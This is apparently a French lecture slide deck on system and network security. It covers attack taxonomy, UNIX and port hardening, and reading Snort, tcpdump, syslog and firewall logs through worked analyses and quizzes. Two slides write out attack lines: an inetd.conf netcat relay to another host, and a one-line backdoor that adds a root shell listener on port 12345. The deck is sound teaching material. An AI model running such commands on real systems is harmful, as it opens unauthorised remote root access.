Sécurité des systèmes
et des réseaux
- Taxonomie & Analyse des Logs -
Abderrazak JEMAI
Professeur en informatique INSAT
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
1
Plan
Taxonomie de la sécurité
Sécurisation des systèmes d’exploitation : Cas du
système UNIX
Sécurisation des ports et des services : Well known ports
Analyse de logs : IDS, Firewalls, Syslog
Formats des logs
Méthodologie d’analyse des logs
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
2
Architectures réseaux et
Solutions de Sécurité
Entreprise A
LAN Privé
Collaborateur
Internet
Zone pub
Client
Serveur ftp
Serveur Web
Employé
distant
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
3
Menaces et
Solutions de Sécurité
Entreprise A
Collaborateur
LAN Privé
Services
Firewall
Internet
Données
DMZ
Serveur ftp
Serveur Web
Client
Hacker
Employé
distant
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
4
Mesures et Réponses
Entreprise A
Collaborateur
LAN Privé
Services
Firewall
Internet
Données
S
e
r
v
e
r
P
r
o
x
y
DMZ
Serveur ftp
Serveur Web
Client
Hacker
Employé
distant
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
5
Mesures et Réponses
Entreprise A
Collaborateur
LAN Privé
Services
Firewall
I
D
S
Données
S
e
r
v
e
r
P
r
o
x
y
Internet
DMZ
Serveur ftp
Serveur Web
Client
Hacker
Employé
distant
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
6
Mesures et Réponses
Entreprise A
Qui a servi ?
Services
LAN Privé
Quelle donnée a
été échangée ?
Quelles sont les
tentatives ?
Firewall
Collaborateur
Internet
I
D
S
Données
S
e
r
v
e
r
P
r
o
x
y
DMZ
Serveur ftp
Serveur Web
Client
Hacker
Employé
distant
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
7
Composantes de la sécurité
Un attaquant cherche à compromettre l’une de ces trois
composantes
Confidentialité (Consultation illégitime des données)
Intégrité (Modification frauduleuse)
Disponibilité (Services, Données)
Un administrateur de sécurité doit veiller sur ces trois
composantes :
Mesures préventives (Sauvegardes, Traces, HACMP)
Détection (IDS, Analyse des logs)
Réaction (Restauration, Architecture de secours)
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
8
Classification des attaques
Selon sa gravité, une attaque peut être classée de type:
Probing/Collection(ping, port scanning, ingénierie sociale, etc.).
R2L Remote to Local/Connexion (rlogin, etc.)
U2R User to Root/Pouvoir (su, buffer overflow, etc.)
DoS/Exploitation (rm *, kill, halt, etc.)
Un administrateur doit maitriser l’attaque :
But de l’attaquant (Confidentialité, Intégrité, Disponibilité)
Gravité (Probing, R2L, U2R, DoS)
Acteurs (Users, Data, Process, Network, Procédures)
Méthode (scénarios de l’attaque)
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
9
L’attaque et ses acteurs
Services
Données
Menaces
Firewall, IDS,
Proxy, Logs
VULNERABILITES
ATTAQUES
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
10
60 types of SIS
Disponibilté
Intégrité
Confidentialité
A
C
T
E
U
R
S
Méthode/Attack Model
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
11
Repérer les menaces et limiter les
effets des attaques…
Mener périodiquement des actions d’audit de sécurité
Audit organisationnelle
Audit technique
Repérer les vulnérabilités des systèmes d’exploitation et
renforcer leur sécurité.
Sécuriser les ports et services
Analyser périodiquement les logs : corrélation
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
12
Sécurité des Systèmes
- Cas de UNIX -
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
13
Le système de fichiers
dev
bin
etc
mnt
home
tmp
usr
var
passwd
group
bin
man
spool
log
lp mail
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
14
Noyau et processus
Publicité
ksh
Processus 1
Processus 2
Processus N
Matériel : disques,
mémoire, cartes
interfaces, etc.)
bash
Noyau
sh
csh
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
15
Mécanisme de démarrage d’UNIX
Démarrage
init
/etc/inittab
NFS
crond
inetd
lpd
login
/etc/passwd
Processus
système :
démons
ksh
Écouter aux commandes
de l’utilisateur
cat
vi
netcat
Processus
utilisateur
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
16
/etc/inetd.conf
telnet
stream tcp
nowait
root
/usr/sbin/in.telnetdin.telnetd
ftp
stream tcp
nowait
root
/usr/sbin/in.ftpd
in.ftpd
Nom du service : (ex telnet)
Type de socket : type de connection (stream, dgram, raw, etc.).
Protocole : tcp ou udp
Etat : nowait, créer un processus pour chaque requête.
Propriétaire : le service aura les permissions du propriétaire.
Programme : nom du programme à lancer
Arguments : Les arguments associés au lancement du programme.
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
17
Attaques sur /etc/inetd.conf
Traffic Relaying
Relay A
Output-to-input
Ecouteur netcat
victime
Client netcat
Hacker
Relay B
Output-to-input
Configuration de /etc/inetd.conf :
11111 stream tcp nowait nobody /usr/sbin/tcpd /usr/bin/nc 192.168.123.28 54321
Écouter sur le port 11111 et rediriger vers la machine 192.168.123.28
sur son port 54321
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
18
Init et inetd
init
n
e
t
n
e
t
u
o
c
E
e
c
n
e
n
a
m
r
e
p
httpd
sendmail
inetd
ftpd
telnetd
tftpd
Lancement à la
demande par
inetd
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
19
Attaques sur inetd :
Backdoor
/bin/sh –c " echo 12345 stream tcp nowait
root /bin/sh sh –i " >> /etc/inetd.conf;
killall –HUP inetd
Rajouter un écouteur sur le port 12345 qui exécute
toute commande reçue sur le port d’entrée.
Demander à inetd de relire son fichier de configuration.
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
20
Sécurisation d’UNIX
Contrôle d’accès : Unix trust, Kerberos, NIS, rlogin
Intégrité : Mettre sous contrôle de TRIPWIRE
Les ports /etc/services
Les fichier de configuration /etc/*.conf
Services réseaux /etc/inetd.conf
Disponibilté : init, cron, filesystem, ps
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
21
Sécurité
des ports et des
services
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
22
Les ports et services associés
Ports : voies de communication d’un système avec les autres systèmes.
Les ports sont définis au niveau de la couche transport pour interfacer la couche
session (couche 5).
A chaque numéro de port est associé un ou plusieurs services (TCP, UDP,
ICMP).
Les ports conventionnels [1..1023] sont souvent des ports serveurs.
Les ports non conventionnels [1024..65000] sont souvent des ports desquels
sortent les requêtes clients.
Les ports sont définis sous Unix dans /etc/services.
Connexion TCP :
three-way handshake
Service orienté connexion
Service fiable
UDP
Best-effort data transfert
Service datagram non connecté.
23
(c) A.JEMAI - Séc SysExp-
Réseaux-Analyse des Logs -
2020
Ports et Services
Port 7 : echo
Port 11 : systat
Port 15 : netstat
Port 19 : chargen
Port 21 : ftp
Port 23 : telnet
Port 25 : SMTP
Port 53 : domain
Port 67 : bootp
Port 69 : tftp
Port 79 : finger
Port 80 : http
Port 109 : pop 2
Port 110 : pop 3
Port 111 : portmap
Port 135 loc-serv
Port 137 : nbname
Port 138 : nbdatagram
Port 139 : nbsesion
Port 161 : SNMP
Port 512 : excec
Port 513 : login
Port 514 : shell
Port 514 : syslog
Port 517 : talk
Port 518 : ntalk
Port 520 : route
Port 540 : uucp
(c) A.JEMAI - Séc SysExp-
Réseaux-Analyse des Logs -
2020
24
Sécurisation du Port 7
Echo
Les systèmes actuels n’ont pas besoin de ce service.
Utilisé pour tester la connexion (ping).
Peut être utilisé pour causer un dénis de service DoS (Denial of Service).
Il faut le désactiver :
Unix :
vi /etc/inetd.conf
Rajouter un # en debut de l’entrée « echo »
Redémarrer le système
Windows
Exécuter « Regedit.exe »
Affecter la valeur « false » ou « 0 » à l’entrée « echo »
Redémarrer le système
25
(c) A.JEMAI - Séc SysExp-
Réseaux-Analyse des Logs -
2020
Sécurité
Informatique
Analyse des Logs
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
26
Lecture des fichiers logs
Ce module décrit les formats des logs suivants :
TCPdump
Snort
Les ACLs des produits Cisco
Syslog
Firewalls
A la fin de ce module vous serez en mesure de
Faire une bonne interprétation des fichiers log
Identifier la source des données
Mesurer l’importance de l’information
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
27
Format du sniffer TCPdump
Origine : Créé par Network Research Group à
Laurence Berkeley National Lab.
Objectif : lecture et analyse du trafic réseaux
Plateforme : Linux
Exemple de log :
11:53:46.105006 eth0 > 192.152.100.12.1234 >
193.142.10.8.www: s 6350050: 6350050(0) win 8192
< mss 1460,nop,nop,sackOK>(DF)
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
28
Publicité
TCPdump : format du log
11:53:46.105006 eth0 > 192.152.100.12.1234 >
Temps
Interface
Adresse source
193.142.10.8.www: s 6350050: 6350050(0) win
Adresse destination
Sequence Number
8192 < mss 1460,nop,nop,sackOK>(DF)
Options
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
29
Les outils de détection d’intrusion
IDS
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
30
Snort
Origine : Créé par Martin Roesch. freeware
Objectif : C’est un IDS : Système de Détection
d’Intrusion
Plateforme : Unix (Linux) et Windows
Exemple de log :
[] IDS024 –RPC- portmap-request-ttdbserv []
07/27-13:45:51.312456 10.0.0.60:800 -> 192.168.10.120:111
UDP TTL:64 TOS: 0x0 ID:33481
Len: 64
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
31
Snort : format du log
[] IDS024 –RPC- portmap-request-ttdbserv []
Nom de l’Alerte
07/27-13:45:51.312456 10.0.0.60:800 -> 192.168.10.120:111
Temps
Source
Direction du trafic
Destination
UDP TTL:64 TOS: 0x0 ID:33481 Len: 64
Type de protocole
Session ID
Time to Live
Type Of Service
Longueur
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
32
Snort
[**] : caractéristique de Snort
Format très similaire à TCPdump
Snort peut délivrer le code en hexa du paquet
Capture d’un paquet TCP avec snort
[] rwwwshell CGI access attempt []
06/10-07:55:01.282456 10.0.0.60:1526 -> 192.168.10.120:80 TCP TTL:52
TOS: 0x0 ID:4816 DF PA
Seq: 0xF3512C9 Ack: 0x9b3254 Win:7D78
47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 72 77 77 GET /cgi-su…
77 73 68 65 6C 6C 2E 70 …
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
33
Syslog
Définition : c’est le démon de log système
Lieu de stockage : /var/log
Plusieurs outils de sécurité délivre leurs reports à syslog
Extrait de log délivré par le firewall portsentry :
Jun 4 04:50:12 degiserv abacus sentry [105112] :attackalert:
Date et temps
hostname
Outils d’alerte
External command run for host 213.26.142.2
Description de l’alerte
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
34
Syslog (suite)
Syslog peut être utilisé pour suivre :
telnet
rlogin
ftp
rsh
La façon dont syslogd génère les messages se configure
en éditant le fichier de configuration /etc/syslogd.conf.
Pour voir la dernière trace :
tail –f /var/adm/messages
May 23 09:30:00 ARCH inetd[1000]:telnet[1020] from
192.168.1.24 40000
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
35
Les formats des logs des
Firewalls
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
36
Firewall Cisco ACL
Routeur & filtre
Origine : Cisco
Objectif : C’est un firewall IP filter
Exemple de log :
Feb 1 13:45:51 rt1 11542 08:00:42
Date &Time
HostName
Seq. Num.
Heure GMT
List 102 denied icmp 192.168.0.200 -> 192.168.13.122
ACL
IP source
IP destination
(8/0), 5 paquets
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
37
Méthodologie d’analyse
des logs
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
38
Etapes d’analyse des logs
Délimiter les traces à analyser
Déterminer la source de la trace (ex : snort)
Probabilité que l’adresse IP source a été spoofée.
Description de l’attaque : (quoi ?). Exemple : L’agresseur
voudrait connaître la version du BIND.
Mécanisme d’attaque : (comment ?). Exemple : Inverse DNS
query.
Corrélation : référer avec des attaques enregistrées
(www.sans.org).
Evidence d’être ciblé
Sévérité de l’attaque
Recommandations
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
39
Etapes d’analyse des logs
Délimiter les traces à analyser
Il s’agit de collecter la ou les traces qui ont attiré votre attention à fin de
les analyser de près.
Déterminer la source de la trace et connaître par conséquents les
règles de filtrage.
Snort IDS, : règles sont mises à jours chaque semaine (version du filtre).
Shadow,
PIX Firewall
Etc.
Probabilité que l’adresse IP source a été spoofée.
Les attaques qui causent des DOS sont souvent suite à des IP spoofées.
Les attaques de type « Smurf » et « ICMP broadcast » sont souvent suite à
des IP spoofées.
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
40
Etapes d’analyse des logs
- Effet de tierce partie -
C’est le cas ou quelqu’un utilise votre adresse pour attaquer une
victime.
Exemple : TCPdump « flood attacks »
L’agresseur se déguise via plusieurs adresse IP différentes pour attaquer la
victime « plusieurs SYN en même temps »
02:58:01 victime.dom.com > 171.30.67.23.2348 :
R:0:0(0) ack 6747198802 win 0
02:58:11 victime.dom.com > 171.32.07.21.1408 :
R:0:0(0) ack 6747198802 win 0
Le numéro de séquence 6747198801 caractérise une attaque « flood » bien
connue.
Pour tester si un paquet est spoofé, utilisez Despoof.
Despoof est un utilitaire sous Unix (Linux Bsd) se basant sur le TTL :
http://razor.bindview.com/tools
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
41
Etapes d’analyse des logs
Délimiter les traces à analyser
Déterminer la source de la trace (ex : snort)
Probabilité que l’adresse IP source a été spoofée.
Description de l’attaque : (quoi ?). Exemple : L’agresseur
voudrait connaître la version du BIND.
Mécanisme d’attaque : (comment ?). Exemple : Inverse DNS
query.
Corrélation : référer avec des attaques enregistrées
(www.sans.org).
Evidence d’être ciblé
Sévérité de l’attaque
Recommandations
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
42
Etapes d’analyse des logs
- Description de l’attaque -
Plusieurs attaques peuvent être identifiées.
La réponse répétitive à un numéro de séquence 6747198801 dénote une
attaque de type « flood attack »
Un paquet SYN/FIN envoyé du port 109 au port 109 identifie une attaque
sur le port POP2.
Un paquet SYN/FIN envoyé du port 53 au port 53 identifie une attaque sur
le port DNS et surnommée par « ADM buffer overflow against DNS ».
Une attaque sur le port 5135/udp vise le service SGI (démon qui permet la
création des comptes sur IRIX).
Liste d’attaques identifiées :
http://www.sans.org : attaques identifiées.
Xforce http://www.iss.net/xforce : vulnérabilité
Bindview http://www.bindview.com : vulnérabilité
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
43
Etapes d’analyse des logs
Délimiter les traces à analyser
Déterminer la source de la trace (ex : snort)
Probabilité que l’adresse IP source a été spoofée.
Description de l’attaque : (quoi ?). Exemple : L’agresseur
voudrait connaître la version du BIND.
Mécanisme d’attaque : (comment ?). Exemple : Inverse
DNS query.
Corrélation : référer avec des attaques enregistrées
(www.sans.org).
Evidence d’être ciblé
Sévérité de l’attaque
Recommandations
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
44
Etapes d’analyse des logs
- Mécanisme de l’attaque -
Il s’agit de développer un ou plusieurs scénarios
d’attaques.
Quatre questions de base :
Est-ce le paquet est un stimulus ou une réponse ?
Quel service est en train d’être ciblé ?
Est-ce le service dispose de vulnérabilités connues ?
Est-ce cette attaque est
Bénigne
De type reconnaissance
De type DOS (Denial Of Service)
Exploitation
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
45
Exemple :
Mécanisme de l’attaque
Analyser le type d’attaque provenant du paquet :
[] … []
04/21-17:05:12.45712 someone.dom.com:2140->
Publicité
me.at.home: 60000 UDP TTL:50 TOS:0x0 ID2320 Len:10
Il s’agit d’une attaque qui dialogue avec le cheval de troie
Deep Throat ou
SubSeven
Pourquoi ?
Deep Throat ou Sub Seven s’installe souvent sur le port 60000 UDP
Un paquet UDP d’une taille assez petite (10) est signe d’un paquet non
ordinaire.
Comment ?
Ce paquet est un stimulus pour vérifier si un service est installé sur le port
60000.
Le service est Deep Throat ou Sub Seven.
L’agresseur tente de scanner plusieurs adresses dans l’espoir de trouver ce
torjan.
Il s’agit d’une reconnaissance si l’agresseur tente plusieurs adresses.
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
46
Etapes d’analyse des logs
Délimiter les traces à analyser
Déterminer la source de la trace (ex : snort)
Probabilité que l’adresse IP source a été spoofée.
Description de l’attaque : (quoi ?). Exemple : L’agresseur
voudrait connaître la version du BIND.
Mécanisme d’attaque : (comment ?). Exemple : Inverse DNS
query.
Corrélation : référer avec des attaques enregistrées
(www.sans.org).
Evidence d’être ciblé
Sévérité de l’attaque
Recommandations
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
47
Etapes d’analyse des logs
- Corrélation -
Il s’agit de corréler cette attaque avec d’autres
attaques semblables.
Liste des sites qui exposent les attaques :
GIAC (Global Insident Analysis Center)
www.sans.org
Ouvrages :
Networks Intrusion Detection
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
48
Etapes d’analyse des logs
Délimiter les traces à analyser
Déterminer la source de la trace (ex : snort)
Probabilité que l’adresse IP source a été spoofée.
Description de l’attaque : (quoi ?). Exemple : L’agresseur
voudrait connaître la version du BIND.
Mécanisme d’attaque : (comment ?). Exemple : Inverse DNS
query.
Corrélation : référer avec des attaques enregistrées
(www.sans.org).
Evidence d’être ciblé
Sévérité de l’attaque
Recommandations
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
49
Etapes d’analyse des logs
- Evidence d’être ciblé -
Il s’agit de se poser deux questions principales :
Est-ce qu’il s’agit de simples paquets envoyés ?
Est-ce qu’ils nous ciblent réellement ?
Est-ce qu’ils ciblent un poste particulier ? Donc une
reconnaissance préalable a eu lieu.
Est-ce qu’il s’agit d’un scan général de tout le réseau ?
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
50
Evidence d’être ciblé
Exemples
Exemple 1 :
21:03:12.65 badgay.com.265500 >
deskttophost.com.5135: udp 52
5135 dénote le démon SGI object server
Si «deskttophost.com» est une machine SGI-IRIX, on peut conclure que c’est une
attaque ciblée.
Exemple 2 :
21:03:12.6005 badgay.com.1005 >
goodgay.com.53?version.version.(30)
L’agresseur cible le serveur DNS.
Il souhaite connaître la version du BIND pour exploiter ses failles.
Auparavant un travail de reconnaissance a été réalisé.
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
51
Etapes d’analyse des logs
Délimiter les traces à analyser
Déterminer la source de la trace (ex : snort)
Probabilité que l’adresse IP source a été spoofée.
Description de l’attaque : (quoi ?). Exemple : L’agresseur
voudrait connaître la version du BIND.
Mécanisme d’attaque : (comment ?). Exemple : Inverse DNS
query.
Corrélation : référer avec des attaques enregistrées
(www.sans.org).
Evidence d’être ciblé
Sévérité de l’attaque
Recommandations
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
52
Etapes d’analyse des logs
- Sévérité -
Sévérité = (Criticalité + Gravité) –(Défense Système +
Défense Réseau)
Il s’agit d’attribuer une note entre [-10 … +10] pour caractériser
l’attaque.
Criticalité (Criticality ) : Importance de la ressource attaquée.
Gravité (Leathality) : Degré d’agressivité de l’attaquant.
Défense Système (System Countermeasures ) : Moyens mis dans le
système pour se défendre.
Défense Réseau (Network Countermeasures) : Moyens mis en
réseau (firewall) pour protéger les ressources.
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
53
Etapes d’analyse des logs
Délimiter les traces à analyser
Déterminer la source de la trace (ex : snort)
Probabilité que l’adresse IP source a été spoofée.
Description de l’attaque : (quoi ?). Exemple : L’agresseur
voudrait connaître la version du BIND.
Mécanisme d’attaque : (comment ?). Exemple : Inverse DNS
query.
Corrélation : référer avec des attaques enregistrées
(www.sans.org).
Evidence d’être ciblé
Sévérité de l’attaque
Recommandations
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
54
Etapes d’analyse des logs
- Recommandations -
Ce sont des recommandations données par
l’analyste pour mieux résister au futur attaques.
L’urgence à mettre en application ces
recommandations dépendent de la valeur de la
sévérité calculée.
Si (sévérité > 0) alors il y a urgence.
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
55
Conclusion
Les logs proviennent de trois sources:
Qui sert les hackers (Syslogd)
Qu’est ce que qui a été échangé fraudileusement
(IDS et sniffers : snort, tcpdump)
Préparation des attaques et Politique de sécurité
(Firewalls)
Corrélation entre les logs est indispensable
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
56
Bibligraphie
Aurobindo Sundaram « An Introduction to
Intrusion Detection » 1996.
Stephen Nothcutt « Intrusion Signature and
Analysis » New Readers Edition.
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
57
Etapes d’analyse des logs
- Exemple complet -
Snort.
[] MISC-DNS-version-query []
08/12-22:26:16.457900 SCANNER.OTHER.NET:1132 -> DNS_SERVER.MY.NET:53 UDP
TTL:64 TOS:0x0 ID48362 Len 38
[] IDS212 – MISC – DNS Zone transfert []
08/12-22:26:17.457930 SCANNER.OTHER.NET:1132 -> DNS_SERVER.MY.NET:53 TCP
TTL:64 TOS:0x0 ID48366 DF PA Seq 0x7663C408 ack:0x8DADD372 Win:
0x4470
TCPDump.
22:26:16.450008 SCANNER.OTHER.NET.1132 > DNS_SERVER.MY.NET.domain: 12329
inv_q+ [b2&3=0x980] A? . (27) (ttl 64, id 48361)
22:26:16.450100 DNS_SERVER.MY.NET.domain > SCANNER.OTHER.NET.1132 12329
inv_q+ q: [4.3.2.1]. 1/0/0 . (42) (ttl 64, id 45177)
Syslog.
Aug 12 22:26:15 DNS_SERVER named [19779]: XX /DNS_SERVER/DNS_SERVER/-A
Aug 12 22:26:15 DNS_SERVER named [19779]: XX
/DNS_SERVER/version_bind/TXT
Aug 12 22:26:16 DNS_SERVER named approved AXFR from
[SCANNER.OTHER.NET].1200 for « MY.NET »
Aug 12 22:26:16 DNS_SERVER named [19779]: XX /DNS_SERVER/MY.NET/AWFR
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
58
Exemple complet
Source : Snort & TCPdump
Probabilité que l’adresse a été spoofée : faible car le
transfert TCP de zones se fait sous haute
confidence.
Description de l’attaque : L’agresseur essaye de connaître
la version du BIND et demande un transfert de
zone. C’est une opération de reconnaissance.
Mécanisme d’attaque : L’agresseur envoie une requête
inversée DNS pour déterminer la version du BIND.
La demande de zone lui permet aussi de collecter
les adresses des hosts du réseau.
Corrélation : Les attaques « Buffer overflow » contre
le DNS sont connus dans
http://www.sans.org/topten.html {cve 0849, 0848}.
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
59
Exemple complet (suite)
Evidence d’être ciblé : Nous sommes bien ciblé et une
attaque par buffer overflow contre notre serveur
DNS est très probable très prochainement.
Sévérité :
Criticalité = 5 : le serveur DNS est une ressource
critique.
Gravité = 2: c’est encore en phase de reconnaissance.
Mesures système = 4 : un nouveau OS avec des patches et
des outils de sécurité additionnels.
Mesures réseau = 1 : peu de protections du firewall.
Sévérité = (5+2)-(4+1) = 2
Recommandations :
Rajouter des règles qui interdisent les requêtes
demandant les versions du BIND.
Voir le site www.psionic.com/papers/dns
Interdire le transfert de zones en dehors du LAN.
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
60
QCM
Publicité
Aug 12 22:14:12 DNS_SERVER named [19779]: XX
/DNS_SERVER/DNS_SERVER/-A
Aug 12 22:14:12 DNS_SERVER named [19779]: XX
/DNS_SERVER/version.bind/TXT
Aug 12 22:14:13 DNS_SERVER named [19779]:
approved AXFR from [SCANNER.OTHER.NET].1200 for «
MY.NET »
Aug 12 22:14:13 DNS_SERVER named [19779]: XX
/DNS_SERVER/MY.NET/AXFR
Indiquer la bonne suggestion :
A. SCANNER.OTHER.NET a attaqué avec succès le cache du serveur
DNS
B. SCANNER.OTHER.NET tente une attaque remote buffer overflow
contre le serveur DNS
C. C’est normal de demander la version du BIND avant de demander un
AXFR.
D. SCANNER.OTHER.NET demande un transfert de zone et est
approuvée.
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
61
Réponse au QCM
Réponse D
Séquence de l’opération :
1. Named envoie une requête de type A
2. Le serveur DNS délivre la version du BIND.
3. Le serveur DNS approuve AXFR au
SCANNER.OTHER.NET
4. Transfert de zone effectué
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
62
Logs des Firewalls
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
63
Firewall
Comparés aux IDS les Firewalls délivrent peu
d’information.
Les firewalls délivrent principalement :
Le temps d’apparition du paquet
Port et adresse IP source
Port et adresse IP destination
Protocole (IP, UDP, ICMP)
Action (permit, deny)
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
64
Routeurs CISCO
Mar 31 02:52:42 rt1 1440: 10:34:19: %SEC-6-
IPACCESSLOGDP: List 102 denied icmp 209.67.78.202 ->
external.primary.dns (8/0), 2 packets
Mar 31 08:09:37 rt1 2264: 15:34:19: %SEC-6-
IPACCESSLOGDP: List 102 denied icmp 209.67.78.202 ->
external.primary.dns (8/0), 1 packet
Mar 31 08:09:57 rt1 2265: 15:51:19: %SEC-6-
IPACCESSLOGP: List 102 denied tcp 209.67.78.202(2100)
-> external.primary.dns (53), 1 packet
Mar 31 08:54:23 rt1 2397: 16:34:19: %SEC-6-
IPACCESSLOGP: List 102 denied udp 209.67.78.202(3408)
-> external.primary.dns (33434), 1 packet
Mar 31 13:52:42 rt1 3319: 21:34:19: %SEC-6-
IPACCESSLOGP: List 102 denied udp 209.67.78.202(3408)
-> external.primary.dns (33434), 1 packet
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
65
Routeur CISCO
Analyse du log
Source : CISCO ACL logs
Probabilité que l’adresse a été spoofée : faible.
Description de l’attaque : C’est une attaque de
reconnaissance sur le serveur DNS.
Mécanisme d’attaque :
L’agresseur envoie une requête ping sur le
serveur DNS pour savoir s’il est en ligne.
Ensuite l’agresseur demande un transfert de
zone.
Corrélation : Les attaques de reconnaissance
sont décrites dans « Network Intrusion and
Analysis » www.sans.org .
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
66
Exemple complet (suite)
Evidence d’être ciblé : C’est une attaque qui vise
le serveur DNS particulièrement.
Sévérité :
Criticalité = 5 : le serveur DNS est une ressource
critique.
Gravité = 2 : c’est encore en phase de
reconnaissance.
Mesures système = 5 : un nouveau OS avec des
patches et des outils de sécurité additionnels.
Mesures réseau = 5 : Très bonne protection réseau.
Sévérité = (5+2)-(5+5) = -3
Recommandations :
La défense est bonne
Le routeur ACL bloque l’attaque.
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
67
QCM
Comment vous caractérisez l’attaque :
A. Port scan
B. Attaque Teardrop
C. Scan pour transfert de zone
D. Buffer overflow
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
68
Réponse au QCM
Réponse C
Séquence de l’opération :
2.
1. Requêtes ICMP, donc demande d’information
3ème ligne indique un rejet de requête au port
53/tcp sur le serveur DNS qui est associé à une
transfert de zone
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
69
Firewall 1 de Check Point
19-May-00 02:52:42 drop inbound udp
scan.wins.guy MY.NET.29.8 netbios-ns netbios-ns
78
19-May-00 02:53:02 drop inbound udp
scan.wins.guy MY.NET.29.9 netbios-ns netbios-ns
78
19-May-00 02:53:22 drop inbound udp
scan.wins.guy MY.NET.29.10 netbios-ns netbios-ns
78
…
19-May-00 18:15:18 drop inbound udp
scan.wins.guy MY.NET.29.252 netbios-ns netbios-
ns 78
19-May-00 18:15:29 drop inbound udp
scan.wins.guy MY.NET.29.253 netbios-ns netbios-
ns 78
19-May-00 18:15:39 drop inbound udp
scan.wins.guy MY.NET.29.254 netbios-ns netbios-
ns 78
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
70
Firewall1 de Check Point
Analyse du log
Source : Firewall 1 de Check Point
Probabilité que l’adresse a été spoofée : faible
l’agresseur tente de rassembler des
informations.
Description de l’attaque : C’est une attaque sur
tous les hosts d’un réseau de classe C.
Mécanisme d’attaque :
L’agresseur envoie une requête ping sur le port
137 qui présente des failles sur les machines
NT (file sharing).
Corrélation : Les attaques sur le port 137
sont enregistrées en nombre 7 dans les
menaces (ports 135-139) www.sans.org et
CVE 1999-0288
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
71
Exemple complet (suite)
Evidence d’être ciblé : C’est une attaque qui ne
vise pas un poste particulier.
Sévérité :
Criticalité = 2 : les postes sont ordinaires.
Gravité = 2 : c’est encore en phase de
reconnaissance.
